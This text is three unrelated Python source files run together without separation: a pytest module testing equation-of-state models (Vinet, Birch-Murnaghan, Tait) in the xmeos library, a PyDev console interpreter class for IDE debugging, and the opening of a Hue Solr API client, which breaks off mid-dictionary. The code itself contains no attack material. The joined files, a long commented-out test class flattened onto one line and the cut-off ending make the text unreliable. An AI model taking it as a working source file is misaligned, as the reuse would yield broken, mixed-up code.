# from __future__ import absolute_import, print_function, division, with_statement
from builtins import object
import numpy as np
import xmeos
from xmeos import models
from xmeos.models import core
import pytest
import matplotlib.pyplot as plt
import matplotlib as mpl
from abc import ABCMeta, abstractmethod
import copy
import test_models

try:
    import cPickle as pickle
except:
    import pickle

#====================================================================
# Define "slow" tests
#  - indicated by @slow decorator
#  - slow tests are run only if using --runslow cmd line arg
#====================================================================
# NOTE: the global `pytest.config` was removed in pytest 5; newer pytest needs a
# conftest.py-based fixture to build this marker instead.
slow = pytest.mark.skipif(
    not pytest.config.getoption("--runslow"),
    reason="need --runslow option to run")

#====================================================================
# SEC:1 Abstract Test Classes
#====================================================================
class BaseTestCompressEos(test_models.BaseTestEos):
    def test_press_S(self):
        self.calc_test_press(path_const='S')

    def test_press_T(self):
        self.calc_test_press(path_const='T')

    def test_press_0K(self):
        self.calc_test_press(path_const='0K')

    def calc_test_press(self, path_const='T'):
        """Verify that press(V) matches -dE/dV along the chosen path."""
        TOL = 1e-3

        Nsamp = 10001
        eos_mod = self.load_eos(path_const=path_const)

        V0, = eos_mod.get_param_values(param_names='V0')
        V0 += -.137
        eos_mod.set_param_values(V0, param_names='V0')

        V0get, = eos_mod.get_param_values(param_names='V0')

        assert V0 == V0get, 'Must be able to store and retrieve non-integer values'

        assert np.abs(eos_mod.press(V0)) < TOL/100, (
            'pressure at V0 must be zero by definition')

        Vmod_a = np.linspace(.7, 1.2, Nsamp)*V0
        dV = Vmod_a[1] - Vmod_a[0]

        press_a = eos_mod.press(Vmod_a)
        energy_a = eos_mod.energy(Vmod_a)

        # PV_ratio converts the energy/volume slope into pressure units
        abs_err, rel_err, range_err = self.numerical_deriv(
            Vmod_a, energy_a, press_a, scale=-core.CONSTS['PV_ratio'])

        assert range_err < TOL, (
            'range error in Press, ' + str(range_err) +
            ', must be less than TOL, ' + str(TOL))

    def do_test_energy_perturb_eval(self):
        # NOTE: this helper still uses the legacy eos_d/compress_path_mod API and is
        # only exercised by the commented-out expansion tests at the end of the file.
        TOL = 1e-4
        dxfrac = 1e-8

        Nsamp = 10001
        eos_mod = self.init_params()

        param_d = eos_d['param_d']
        Vmod_a = np.linspace(.7, 1.3, Nsamp)*param_d['V0']
        dV = Vmod_a[1] - Vmod_a[0]

        if compress_path_mod.expand_adj:
            scale_a, paramkey_a = \
                compress_path_mod.get_param_scale(eos_d, apply_expand_adj=True)
        else:
            scale_a, paramkey_a = compress_path_mod.get_param_scale(eos_d)

        Eperturb_num_a = np.zeros((paramkey_a.size, Nsamp))
        for ind, paramkey in enumerate(paramkey_a):
            Eperturb_num_a[ind,:] = compress_path_mod.param_deriv(
                'energy', paramkey, Vmod_a, eos_d, dxfrac=dxfrac)

        # dEdV0_a = compress_path_mod.param_deriv( 'energy', 'V0', Vmod_a, eos_d, dxfrac=dxfrac)
        # dEdK0_a = compress_path_mod.param_deriv( 'energy', 'K0', Vmod_a, eos_d, dxfrac=dxfrac)
        # dEdKP0_a = compress_path_mod.param_deriv( 'energy', 'KP0', Vmod_a, eos_d, dxfrac=dxfrac)
        # dEdKP20_a = compress_path_mod.param_deriv( 'energy', 'KP20', Vmod_a, eos_d, dxfrac=dxfrac)
        # dEdE0_a = compress_path_mod.param_deriv( 'energy', 'E0', Vmod_a, eos_d, dxfrac=dxfrac)

        Eperturb_a, scale_a, paramkey_a = compress_path_mod.energy_perturb(Vmod_a, eos_d)
        # print paramkey_a

        # Eperturb_num_a = np.vstack((dEdV0_a,dEdK0_a,dEdKP0_a,dEdKP20_a,dEdE0_a))
        max_error_a = np.max(np.abs(Eperturb_a-Eperturb_num_a), axis=1)

        # try:
        # except:
        #     from IPython import embed; embed(); import ipdb; ipdb.set_trace()
        # plt.plot(Vmod_a, Eperturb_a.T, '-', Vmod_a, Eperturb_num_a.T, '--')

        # plt.ion()
        # plt.figure()
        # plt.clf()
        # plt.plot(Vmod_a[::100], Eperturb_num_a[:,::100].T, 'x',
        #          Vmod_a[::100], Eperturb_a[3,::100].T, 'r-')
        #
        # plt.plot(Vmod_a[::100], Eperturb_num_a[:,::100].T, 'x',
        #          Vmod_a, Eperturb_a.T, '-')
        # plt.plot(Vmod_a[::100], Eperturb_a[3,::100].T, 'r-')

        # Eperturb_num_a - Eperturb_a

        assert np.all(max_error_a < TOL), (
            'Error in energy perturbation must be less than TOL.')

    #####################
    # Explicitly call these test methods from super to guarantee correct
    # behavior of decorated xfail classes
    #####################
    def test_param_getset(self):
        super(BaseTestCompressEos, self).test_param_getset()

    def test_pickle(self):
        super(BaseTestCompressEos, self).test_pickle()
#====================================================================


#====================================================================
# SEC:2 Implemented Test Classes
#====================================================================
# 2.1: CompressEos Tests
#====================================================================
class TestVinet(BaseTestCompressEos):
    def load_eos(self, path_const='T'):
        eos_mod = models.CompressEos(kind='Vinet', path_const=path_const)
        return eos_mod
#====================================================================
class TestBirchMurn3(BaseTestCompressEos):
    def load_eos(self, path_const='T'):
        eos_mod = models.CompressEos(kind='BirchMurn3', path_const=path_const)
        return eos_mod
#====================================================================
class TestBirchMurn4(BaseTestCompressEos):
    def load_eos(self, path_const='T'):
        eos_mod = models.CompressEos(kind='BirchMurn4', path_const=path_const)
        return eos_mod
#====================================================================
class TestGenFiniteStrain(BaseTestCompressEos):
    def load_eos(self, path_const='T'):
        eos_mod = models.CompressEos(kind='GenFiniteStrain', path_const=path_const)
        return eos_mod
#====================================================================
class TestTait(BaseTestCompressEos):
    def load_eos(self, path_const='T'):
        eos_mod = models.CompressEos(kind='Tait', path_const=path_const)
        return eos_mod
#====================================================================
notimplimented = pytest.mark.xfail(
    reason='PolyRho energy expressions not implemented yet.')

@notimplimented
class TestPolyRho(BaseTestCompressEos):
    def load_eos(self, path_const='T'):
        eos_mod = models.CompressEos(kind='PolyRho', path_const=path_const, order=6)
        return eos_mod

    def test_poly_scale(self):
        TOL = 1e-6
        Nsamp = 101
        eos_mod = self.load_eos()
        calc = eos_mod.calculators['compress']

        V0, = eos_mod.get_param_values(param_names='V0')
        Vmod_a = np.linspace(.7, 1.2, Nsamp)*V0
        dV = Vmod_a[1] - Vmod_a[0]

        coef_a, rho0 = calc._get_poly_coef()
        rho_a = calc._vol_to_rho(Vmod_a)

        press_a = eos_mod.press(Vmod_a)
        press_direct_a = np.polyval(coef_a, rho_a-rho0)

        dev_a = press_a - press_direct_a

        assert np.all(np.abs(dev_a) < TOL), \
            'PolyRho polynomial calculation of press not consistent'
#====================================================================
# class TestCompareCompressEos(object):
#     def init_params(self):
#         # Set model parameter values
#         E0 = 0.0   # eV/atom
#         V0 = 38.0  # 1e-5 m^3 / kg
#         K0 = 25.0  # GPa
#         KP0 = 9.0  # 1
#         param_key_a = ['V0','K0','KP0','E0']
#         param_val_a = np.array([ V0, K0, KP0, E0 ])
#
#         # core.set_consts( [], [], eos_d )
#         core.set_params( param_key_a, param_val_a, eos_d )
#
#         return eos_d
#
#     def get_eos_mods(self):
#         eos_vinet_d = self.init_params()
#         eos_tait_d = self.init_params()
#
#         core.set_modtypes( ['CompressPathMod'], [compress.Vinet(path_const='S')],
#                            eos_vinet_d )
#         core.set_modtypes( ['CompressPathMod'], [compress.Tait(path_const='S')],
eos_tait_d ) # # return eos_vinet_d, eos_tait_d # # def calc_energy_perturb( self, eos_d ): # dxfrac = 1e-6 # Nsamp = 10001 # # param_d = eos_d['param_d'] # Vmod_a = np.linspace(.7,1.1,Nsamp)*param_d['V0'] # dV = Vmod_a[1] - Vmod_a[0] # # compress_path_mod = eos_d['modtype_d']['CompressPathMod'] # scale_a, paramkey_a = compress_path_mod.get_param_scale( eos_d ) # # Eperturb_num_a = np.zeros((paramkey_a.size,Nsamp)) # for ind,paramkey in enumerate(paramkey_a): # Eperturb_num_a[ind,:] = compress_path_mod.param_deriv\ # ( 'energy', paramkey, Vmod_a, eos_d, dxfrac=dxfrac) # # Eperturb_a, scale_a, paramkey_a = compress_path_mod.energy_perturb(Vmod_a, eos_d) # # Eperturb_num_a = np.zeros((paramkey_a.size,Nsamp)) # for ind,paramkey in enumerate(paramkey_a): # Eperturb_num_a[ind,:] = compress_path_mod.param_deriv\ # ( 'energy', paramkey, Vmod_a, eos_d, dxfrac=dxfrac) # # return Eperturb_a, Eperturb_num_a, Vmod_a, scale_a, paramkey_a # # def calc_energy( self, eos_d ): # dxfrac = 1e-6 # Nsamp = 10001 # # param_d = eos_d['param_d'] # Vmod_a = np.linspace(.7,1.1,Nsamp)*param_d['V0'] # dV = Vmod_a[1] - Vmod_a[0] # # compress_path_mod = eos_d['modtype_d']['CompressPathMod'] # scale_a, paramkey_a = compress_path_mod.get_param_scale( eos_d ) # # energy_a = compress_path_mod.energy( Vmod_a, eos_d ) # # return energy_a, Vmod_a # # def test_compare(self): # TOL = 1e-4 # # eos_vinet_d, eos_tait_d = self.get_eos_mods() # KP20 = -1.1*eos_tait_d['param_d']['KP0']/eos_tait_d['param_d']['K0'] # core.set_params( ['KP20'], [KP20], eos_tait_d ) # # energy_vin_a, Vmod_vin_a = self.calc_energy( eos_vinet_d ) # energy_tait_a, Vmod_tait_a = self.calc_energy( eos_tait_d ) # # # plt.ion() # # plt.figure() # # plt.clf() # # plt.plot(Vmod_vin_a, energy_vin_a,'k-', # # Vmod_tait_a, energy_tait_a, 'r-') # # Eperturb_vin_a, Eperturb_num_vin_a, Vmod_vin_a, scale_vin_a, \ # paramkey_vin_a = self.calc_energy_perturb( eos_vinet_d ) # # Eperturb_tait_a, Eperturb_num_tait_a, Vmod_tait_a, scale_tait_a, \ # paramkey_tait_a = self.calc_energy_perturb( eos_tait_d ) # # # from IPython import embed; embed(); import ipdb; ipdb.set_trace() # # # plt.ion() # # plt.figure() # # plt.clf() # # plt.plot(Vmod_vin_a[::100], Eperturb_vin_a[:,::100].T,'x', # # Vmod_tait_a, Eperturb_tait_a.T,'-') # # dV = Vmod_vin_a[1] - Vmod_vin_a[0] # V0 = eos_tait_d['param_d']['V0'] # indV0 = np.where(Vmod_vin_a==V0)[0][0] # # Eperturb_diff = Eperturb_vin_a[:,indV0] - Eperturb_tait_a[[0,1,2,4],indV0] # # assert np.all(np.abs(Eperturb_diff)<TOL), \ # 'Energy perturbations for Vinet and Tait EOS at V0 must agree to within TOL' # # # Calc numerical volume derivs # # Some of these curves take very small values, making numerical # # comparison difficult, but comparison by eye checks out # dE1_perturb_vin_a = np.gradient(Eperturb_vin_a,dV)[1] # dE2_perturb_vin_a = np.gradient(dE1_perturb_vin_a,dV)[1] # dE3_perturb_vin_a = np.gradient(dE2_perturb_vin_a,dV)[1] # # dE1_perturb_tait_a = np.gradient(Eperturb_tait_a,dV)[1] # dE2_perturb_tait_a = np.gradient(dE1_perturb_tait_a,dV)[1] # dE3_perturb_tait_a = np.gradient(dE2_perturb_tait_a,dV)[1] # # # plt.clf() # # plt.plot(Vmod_vin_a[::100], dE1_perturb_vin_a[:,::100].T,'x', # # Vmod_tait_a, dE1_perturb_tait_a.T,'-') # # # plt.clf() # # plt.plot(Vmod_vin_a[::100], dE2_perturb_vin_a[:,::100].T,'x', # # Vmod_tait_a, dE2_perturb_tait_a.T,'-') # # # Eperturb_vin_a[:,indV0]-Eperturb_tait_a[[0,1,2,4],indV0] # # Eperturb_vin_a[:,indV0] # # # dE1_perturb_vin_a[:,indV0]-dE1_perturb_tait_a[[0,1,2,4],indV0] # # dE1_perturb_vin_a[:,indV0] 
# # # plt.clf() # # plt.plot(Vmod_vin_a[::100], dE3_perturb_vin_a[:,::100].T,'x', # # Vmod_tait_a, dE3_perturb_tait_a.T,'-') # # pass #==================================================================== # class TestExpandCompressPathMod(BaseTestCompressEos): # def load_eos(self, eos_d): # compress_path_mod = compress.Vinet(path_const='S',expand_adj_mod=compress.Tait()) # core.set_modtypes(['CompressPathMod'],[compress_path_mod], eos_d ) # # pass # # def test_press_components(self): # TOL = 1e-4 # dxfrac = 1e-8 # # Nsamp = 10001 # eos_d = self.init_params() # # param_d = eos_d['param_d'] # Vmod_a = np.linspace(.7,1.3,Nsamp)*param_d['V0'] # dV = Vmod_a[1] - Vmod_a[0] # # compress_path_mod = eos_d['modtype_d']['CompressPathMod'] # # press_a = compress_path_mod.press( Vmod_a, eos_d ) # press_pos_a = compress_path_mod.press( Vmod_a, eos_d, apply_expand_adj=False) # press_neg_a = compress_path_mod.expand_adj_mod.press( Vmod_a, eos_d ) # # # press_pos_a = expand_pos_mod.press( Vmod_a, eos_d ) # # press_neg_a = expand_neg_mod.press( Vmod_a, eos_d ) # # # ind_neg = Vmod_a>param_d['V0'] # ind_pos = Vmod_a<param_d['V0'] # # assert np.all(press_a[ind_neg]==press_neg_a[ind_neg]),\ # 'The expansion corrected press must match ExpandNegMod for negative pressure values' # assert np.all(press_a[ind_pos]==press_pos_a[ind_pos]),\ # 'The expansion corrected press must match ExpandPosMod for positive pressure values' # # # from IPython import embed; embed(); import ipdb; ipdb.set_trace() # # plt.ion() # # plt.figure() # # plt.clf() # # plt.plot(Vmod_a, press_pos_a, 'r--', Vmod_a, press_neg_a, 'b--', # # Vmod_a, press_a, 'k-') # # pass # # def test_energy_components(self): # TOL = 1e-4 # dxfrac = 1e-8 # # Nsamp = 10001 # eos_d = self.init_params() # # param_d = eos_d['param_d'] # Vmod_a = np.linspace(.7,1.3,Nsamp)*param_d['V0'] # dV = Vmod_a[1] - Vmod_a[0] # # compress_path_mod = eos_d['modtype_d']['CompressPathMod'] # # energy_a = compress_path_mod.energy( Vmod_a, eos_d ) # energy_pos_a = compress_path_mod.energy( Vmod_a, eos_d, apply_expand_adj=False ) # energy_neg_a = compress_path_mod.expand_adj_mod.energy( Vmod_a, eos_d ) # # # ind_neg = Vmod_a>param_d['V0'] # ind_pos = Vmod_a<param_d['V0'] # # assert np.all(energy_a[ind_neg]==energy_neg_a[ind_neg]),\ # 'The expansion corrected energy must match ExpandNegMod for negative pressure values' # assert np.all(energy_a[ind_pos]==energy_pos_a[ind_pos]),\ # 'The expansion corrected energy must match ExpandPosMod for positive pressure values' # # # # from IPython import embed; embed(); import ipdb; ipdb.set_trace() # # plt.ion() # # plt.figure() # # plt.clf() # # plt.plot(Vmod_a, energy_pos_a, 'r--', Vmod_a, energy_neg_a, 'b--', # # Vmod_a, energy_a, 'k-') # # pass # # def test_energy_perturb_eval(self): # self.do_test_energy_perturb_eval() # pass #====================================================================
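# The consistency check at the heart of calc_test_press above is that the analytic
# pressure must equal the negative volume derivative of the energy along the path,
# P = -dE/dV, with core.CONSTS['PV_ratio'] converting the energy-per-volume slope into
# pressure units. Below is a minimal self-contained sketch of that check, using a
# hand-coded third-order Birch-Murnaghan form and np.gradient in place of the xmeos
# calculators; the parameter values and conversion constant are illustrative
# assumptions, not taken from the library.
#
#     import numpy as np
#
#     # Illustrative third-order Birch-Murnaghan parameters (V in Ang^3, K0 in GPa)
#     V0, K0, KP0 = 11.0, 160.0, 4.5
#     PV_RATIO = 160.2176487  # GPa*Ang^3 per eV (assumed unit-conversion constant)
#
#     def bm3_press(V):
#         f = 0.5*((V0/V)**(2./3) - 1)                 # Eulerian finite strain
#         return 3*K0*f*(1 + 2*f)**2.5*(1 + 1.5*(KP0 - 4)*f)
#
#     def bm3_energy(V):
#         f = 0.5*((V0/V)**(2./3) - 1)
#         return 4.5*K0*V0*f**2*(1 + (KP0 - 4)*f)/PV_RATIO   # energy in eV
#
#     V = np.linspace(0.7, 1.2, 10001)*V0
#     P_analytic = bm3_press(V)
#     P_numeric = -PV_RATIO*np.gradient(bm3_energy(V), V)   # P = -dE/dV, back to GPa
#
#     range_err = np.max(np.abs(P_numeric[1:-1] - P_analytic[1:-1]))/np.ptp(P_analytic)
#     assert range_err < 1e-3
#
# The interior points agree to well below the 1e-3 range tolerance used by the test;
# only the one-sided endpoint estimates of np.gradient are excluded.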
import os import sys import traceback from _pydev_bundle import _pydev_imports_tipper from _pydev_bundle.pydev_code_executor import BaseCodeExecutor from _pydev_bundle.pydev_console_types import CodeFragment from _pydev_bundle.pydev_imports import Exec from _pydev_bundle.pydev_stdin import StdIn, DebugConsoleStdIn from _pydev_imps._pydev_saved_modules import thread from _pydevd_bundle import pydevd_thrift from _pydevd_bundle import pydevd_vars from _pydevd_bundle.pydevd_constants import IS_JYTHON, dict_iter_items from pydev_console.protocol import CompletionOption, CompletionOptionType try: import cStringIO as StringIO #may not always be available @UnusedImport except: try: import StringIO #@Reimport except: import io as StringIO # translation to Thrift `CompletionOptionType` enumeration COMPLETION_OPTION_TYPES = { _pydev_imports_tipper.TYPE_IMPORT: CompletionOptionType.IMPORT, _pydev_imports_tipper.TYPE_CLASS: CompletionOptionType.CLASS, _pydev_imports_tipper.TYPE_FUNCTION: CompletionOptionType.FUNCTION, _pydev_imports_tipper.TYPE_ATTR: CompletionOptionType.ATTR, _pydev_imports_tipper.TYPE_BUILTIN: CompletionOptionType.BUILTIN, _pydev_imports_tipper.TYPE_PARAM: CompletionOptionType.PARAM, _pydev_imports_tipper.TYPE_IPYTHON: CompletionOptionType.IPYTHON, _pydev_imports_tipper.TYPE_IPYTHON_MAGIC: CompletionOptionType.IPYTHON_MAGIC, } def _to_completion_option(word): name, documentation, args, ret_type = word completion_option_type = COMPLETION_OPTION_TYPES[ret_type] return CompletionOption(name, documentation, args.split(), completion_option_type) # ======================================================================================================================= # Null # ======================================================================================================================= class Null: """ Gotten from: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/68205 """ def __init__(self, *args, **kwargs): return None def __call__(self, *args, **kwargs): return self def __getattr__(self, mname): return self def __setattr__(self, name, value): return self def __delattr__(self, name): return self def __repr__(self): return "<Null>" def __str__(self): return "Null" def __len__(self): return 0 def __getitem__(self): return self def __setitem__(self, *args, **kwargs): pass def write(self, *args, **kwargs): pass def __nonzero__(self): return 0 # ======================================================================================================================= # BaseInterpreterInterface # ======================================================================================================================= class BaseInterpreterInterface(BaseCodeExecutor): def __init__(self, mainThread, connect_status_queue=None, rpc_client=None): super(BaseInterpreterInterface, self).__init__() self.mainThread = mainThread self.banner_shown = False self.connect_status_queue = connect_status_queue self.rpc_client = rpc_client def build_banner(self): return 'print({0})\n'.format(repr(self.get_greeting_msg())) def create_std_in(self, debugger=None, original_std_in=None): if debugger is None: return StdIn(self, self.rpc_client, original_stdin=original_std_in) else: return DebugConsoleStdIn(dbg=debugger, original_stdin=original_std_in) def do_exec_code(self, code, is_single_line): try: code_fragment = CodeFragment(code, is_single_line) more = self.need_more(code_fragment) if not more: code_fragment = self.buffer self.buffer = None self.exec_queue.put(code_fragment) return more except: 
traceback.print_exc() return False def execLine(self, line): if not self.banner_shown: line = self.build_banner() + line self.banner_shown = True return self.do_exec_code(line, True) def execMultipleLines(self, lines): if not self.banner_shown: lines = self.build_banner() + lines self.banner_shown = True if IS_JYTHON: for line in lines.split('\n'): self.do_exec_code(line, True) else: return self.do_exec_code(lines, False) def interrupt(self): self.buffer = None # Also clear the buffer when it's interrupted. try: if self.interruptable: called = False try: # Fix for #PyDev-500: Console interrupt can't interrupt on sleep import os import signal if os.name == 'posix': # On Linux we can't interrupt 0 as in Windows because it's # actually owned by a process -- on the good side, signals # work much better on Linux! os.kill(os.getpid(), signal.SIGINT) called = True elif os.name == 'nt': # Stupid windows: sending a Ctrl+C to a process given its pid # is absurdly difficult. # There are utilities to make it work such as # http://www.latenighthacking.com/projects/2003/sendSignal/ # but fortunately for us, it seems Python does allow a CTRL_C_EVENT # for the current process in Windows if pid 0 is passed... if we needed # to send a signal to another process the approach would be # much more difficult. # Still, note that CTRL_C_EVENT is only Python 2.7 onwards... # Also, this doesn't seem to be documented anywhere!? (stumbled # upon it by chance after digging quite a lot). os.kill(0, signal.CTRL_C_EVENT) called = True except: # Many things to go wrong (from CTRL_C_EVENT not being there # to failing import signal)... if that's the case, ask for # forgiveness and go on to the approach which will interrupt # the main thread (but it'll only work when it's executing some Python # code -- not on sleep() for instance). 
pass if not called: if hasattr(thread, 'interrupt_main'): # Jython doesn't have it thread.interrupt_main() else: self.mainThread._thread.interrupt() # Jython self.finish_exec(False) return True except: traceback.print_exc() return False def close(self): sys.exit(0) def get_server(self): if getattr(self, 'rpc_client', None) is not None: return self.rpc_client else: return None server = property(get_server) def ShowConsole(self): server = self.get_server() if server is not None: server.showConsole() def finish_exec(self, more): self.interruptable = False server = self.get_server() if server is not None: return server.notifyFinished(more) else: return True def getFrame(self): hidden_ns = self.get_ipython_hidden_vars_dict() return pydevd_thrift.frame_vars_to_struct(self.get_namespace(), hidden_ns) def getVariable(self, attributes): debug_values = [] val_dict = pydevd_vars.resolve_compound_var_object_fields(self.get_namespace(), attributes) if val_dict is None: val_dict = {} keys = val_dict.keys() for k in keys: val = val_dict[k] evaluate_full_value = pydevd_thrift.should_evaluate_full_value(val) debug_values.append(pydevd_thrift.var_to_struct(val, k, evaluate_full_value=evaluate_full_value)) return debug_values def getArray(self, attr, roffset, coffset, rows, cols, format): name = attr.split("\t")[-1] array = pydevd_vars.eval_in_context(name, self.get_namespace(), self.get_namespace()) return pydevd_thrift.table_like_struct_to_thrift_struct(array, name, roffset, coffset, rows, cols, format) def evaluate(self, expression): # returns `DebugValue` of evaluated expression result = pydevd_vars.eval_in_context(expression, self.get_namespace(), self.get_namespace()) return [pydevd_thrift.var_to_struct(result, expression)] def do_get_completions(self, text, act_tok): """Retrieves completion options. Returns the array with completion options tuples. :param text: the full text of the expression to complete :param act_tok: resolved part of the expression :return: the array of tuples `(name, documentation, args, ret_type)` :Example: Let us execute ``import time`` line in the Python console. Then try to complete ``time.sle`` expression. At this point the method would receive ``time.sle`` as ``text`` parameter and ``time.`` as ``act_tok`` parameter. The result would contain the array with the following tuple among others: ``[..., ('sleep', 'sleep(seconds)\\n\\nDelay execution ...', '(seconds)', '2'), ...]``. 
""" try: from _pydev_bundle._pydev_completer import Completer completer = Completer(self.get_namespace(), None) return completer.complete(act_tok) except: import traceback traceback.print_exc() return [] def getCompletions(self, text, act_tok): words = self.do_get_completions(text, act_tok) return [_to_completion_option(word) for word in words] def loadFullValue(self, seq, scope_attrs): """ Evaluate full value for async Console variables in a separate thread and send results to IDE side :param seq: id of command :param scope_attrs: a sequence of variables with their attributes separated by NEXT_VALUE_SEPARATOR (i.e.: obj\tattr1\tattr2NEXT_VALUE_SEPARATORobj2\attr1\tattr2) :return: """ frame_variables = self.get_namespace() var_objects = [] # vars = scope_attrs.split(NEXT_VALUE_SEPARATOR) vars = scope_attrs for var_attrs in vars: if '\t' in var_attrs: name, attrs = var_attrs.split('\t', 1) else: name = var_attrs attrs = None if name in frame_variables.keys(): var_object = pydevd_vars.resolve_var_object(frame_variables[name], attrs) var_objects.append((var_object, name)) else: var_object = pydevd_vars.eval_in_context(name, frame_variables, frame_variables) var_objects.append((var_object, name)) from _pydev_bundle.pydev_console_commands import ThriftGetValueAsyncThreadConsole t = ThriftGetValueAsyncThreadConsole(self.get_server(), seq, var_objects) t.start() def changeVariable(self, attr, value): def do_change_variable(): Exec('%s=%s' % (attr, value), self.get_namespace(), self.get_namespace()) # Important: it has to be really enabled in the main thread, so, schedule # it to run in the main thread. self.exec_queue.put(do_change_variable) def _findFrame(self, thread_id, frame_id): ''' Used to show console with variables connection. Always return a frame where the locals map to our internal namespace. ''' VIRTUAL_FRAME_ID = "1" # matches PyStackFrameConsole.java VIRTUAL_CONSOLE_ID = "console_main" # matches PyThreadConsole.java if thread_id == VIRTUAL_CONSOLE_ID and frame_id == VIRTUAL_FRAME_ID: f = FakeFrame() f.f_globals = {} # As globals=locals here, let's simply let it empty (and save a bit of network traffic). f.f_locals = self.get_namespace() return f else: return self.orig_find_frame(thread_id, frame_id) def connectToDebugger(self, debuggerPort, debugger_options=None, extra_envs=None): ''' Used to show console with variables connection. Mainly, monkey-patches things in the debugger structure so that the debugger protocol works. 
''' if debugger_options is None: debugger_options = {} for (env_name, value) in dict_iter_items(extra_envs): existing_value = os.environ.get(env_name, None) if existing_value: os.environ[env_name] = "%s%c%s" % (existing_value, os.path.pathsep, value) else: os.environ[env_name] = value if env_name == "PYTHONPATH": sys.path.append(value) def do_connect_to_debugger(): try: # Try to import the packages needed to attach the debugger import pydevd from _pydev_imps._pydev_saved_modules import threading except: # This happens on Jython embedded in host eclipse traceback.print_exc() sys.stderr.write('pydevd is not available, cannot connect\n', ) from _pydev_bundle import pydev_localhost threading.currentThread().__pydevd_id__ = "console_main" self.orig_find_frame = pydevd_vars.find_frame pydevd_vars.find_frame = self._findFrame self.debugger = pydevd.PyDB() try: pydevd.apply_debugger_options(debugger_options) self.debugger.connect(pydev_localhost.get_localhost(), debuggerPort) self.debugger.prepare_to_run() from _pydevd_bundle import pydevd_tracing pydevd_tracing.SetTrace(None) except: traceback.print_exc() sys.stderr.write('Failed to connect to target debugger.\n') # Register to process commands when idle self.debugrunning = False try: import pydevconsole pydevconsole.set_debug_hook(self.debugger.process_internal_commands) except: traceback.print_exc() sys.stderr.write('Version of Python does not support debuggable Interactive Console.\n') # Important: it has to be really enabled in the main thread, so, schedule # it to run in the main thread. self.exec_queue.put(do_connect_to_debugger) return ('connect complete',) def handshake(self): if self.connect_status_queue is not None: self.connect_status_queue.put(True) return "PyCharm" def get_connect_status_queue(self): return self.connect_status_queue def hello(self, input_str): # Don't care what the input string is return ("Hello eclipse",) # ======================================================================================================================= # FakeFrame # ======================================================================================================================= class FakeFrame: ''' Used to show console with variables connection. A class to be used as a mock of a frame. '''
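# The interrupt() method above reduces to a three-step strategy: send a real SIGINT on
# POSIX (which also breaks out of a blocking sleep()), send CTRL_C_EVENT to the current
# process group on Windows, and only fall back to interrupting the main thread when
# neither works. Below is a standalone sketch of that decision tree that assumes
# nothing from the pydev bundle; the function name is illustrative.
#
#     import os
#     import signal
#
#     def interrupt_current_process():
#         """Best-effort console interrupt, mirroring the strategy in interrupt()."""
#         try:
#             if os.name == 'posix':
#                 # A real signal is delivered even while the main thread is in sleep().
#                 os.kill(os.getpid(), signal.SIGINT)
#                 return True
#             elif os.name == 'nt':
#                 # pid 0 targets the current process group; CTRL_C_EVENT is Windows-only.
#                 os.kill(0, signal.CTRL_C_EVENT)
#                 return True
#         except Exception:
#             pass
#         # Fallback: raises KeyboardInterrupt in the main thread, but only once it is
#         # executing Python bytecode again -- it will not break a blocking sleep().
#         try:
#             import _thread as thread   # Python 3
#         except ImportError:
#             import thread              # Python 2 / Jython
#         if hasattr(thread, 'interrupt_main'):
#             thread.interrupt_main()
#         return False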
#!/usr/bin/env python # -- coding: utf-8 -- # Licensed to Cloudera, Inc. under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. Cloudera, Inc. licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import logging import re import urllib from itertools import groupby from django.utils.translation import ugettext as _ from desktop.lib.exceptions_renderable import PopupException from desktop.lib.i18n import force_unicode from desktop.lib.rest.http_client import HttpClient, RestException from desktop.lib.rest import resource from search.conf import EMPTY_QUERY, SECURITY_ENABLED from search.api import _compute_range_facet from libsolr.conf import SSL_CERT_CA_VERIFY LOG = logging.getLogger(__name__) DEFAULT_USER = 'hue' def utf_quoter(what): return urllib.quote(unicode(what).encode('utf-8'), safe='~@#$&()*!+=;,.?/\'') class SolrApi(object): """ http://wiki.apache.org/solr/CoreAdmin#CoreAdminHandler """ def __init__(self, solr_url, user, security_enabled=SECURITY_ENABLED.get(), ssl_cert_ca_verify=SSL_CERT_CA_VERIFY.get()): self._url = solr_url self._user = user self._client = HttpClient(self._url, logger=LOG) self.security_enabled = security_enabled if self.security_enabled: self._client.set_kerberos_auth() self._client.set_verify(ssl_cert_ca_verify) self._root = resource.Resource(self._client) # The Kerberos handshake requires two requests in order to authenticate, # but if our first request is a PUT/POST, it might flat-out reject the # first request if the body is too large. So, connect here in order to get # a cookie so future PUT/POSTs will be pre-authenticated. 
if self.security_enabled: self._root.invoke('HEAD', '/') def _get_params(self): if self.security_enabled: return (('doAs', self._user ),) return (('user.name', DEFAULT_USER), ('doAs', self._user),) def _get_q(self, query): q_template = '(%s)' if len(query['qs']) >= 2 else '%s' return 'OR'.join([q_template % (q['q'] or EMPTY_QUERY.get()) for q in query['qs']]).encode('utf-8') def _get_aggregate_function(self, facet): props = { 'field': facet['field'], 'aggregate': facet['properties']['aggregate'] if 'properties' in facet else facet['aggregate'] } if props['aggregate'] == 'median': return 'percentile(%(field)s,50)' % props else: return '%(aggregate)s(%(field)s)' % props def _get_range_borders(self, collection, query): props = {} GAPS = { '5MINUTES': { 'histogram-widget': {'coeff': '+3', 'unit': 'SECONDS'}, # ~100 slots 'bucket-widget': {'coeff': '+3', 'unit': 'SECONDS'}, # ~100 slots 'bar-widget': {'coeff': '+3', 'unit': 'SECONDS'}, # ~100 slots 'facet-widget': {'coeff': '+1', 'unit': 'MINUTES'}, # ~10 slots }, '30MINUTES': { 'histogram-widget': {'coeff': '+20', 'unit': 'SECONDS'}, 'bucket-widget': {'coeff': '+20', 'unit': 'SECONDS'}, 'bar-widget': {'coeff': '+20', 'unit': 'SECONDS'}, 'facet-widget': {'coeff': '+5', 'unit': 'MINUTES'}, }, '1HOURS': { 'histogram-widget': {'coeff': '+30', 'unit': 'SECONDS'}, 'bucket-widget': {'coeff': '+30', 'unit': 'SECONDS'}, 'bar-widget': {'coeff': '+30', 'unit': 'SECONDS'}, 'facet-widget': {'coeff': '+10', 'unit': 'MINUTES'}, }, '12HOURS': { 'histogram-widget': {'coeff': '+7', 'unit': 'MINUTES'}, 'bucket-widget': 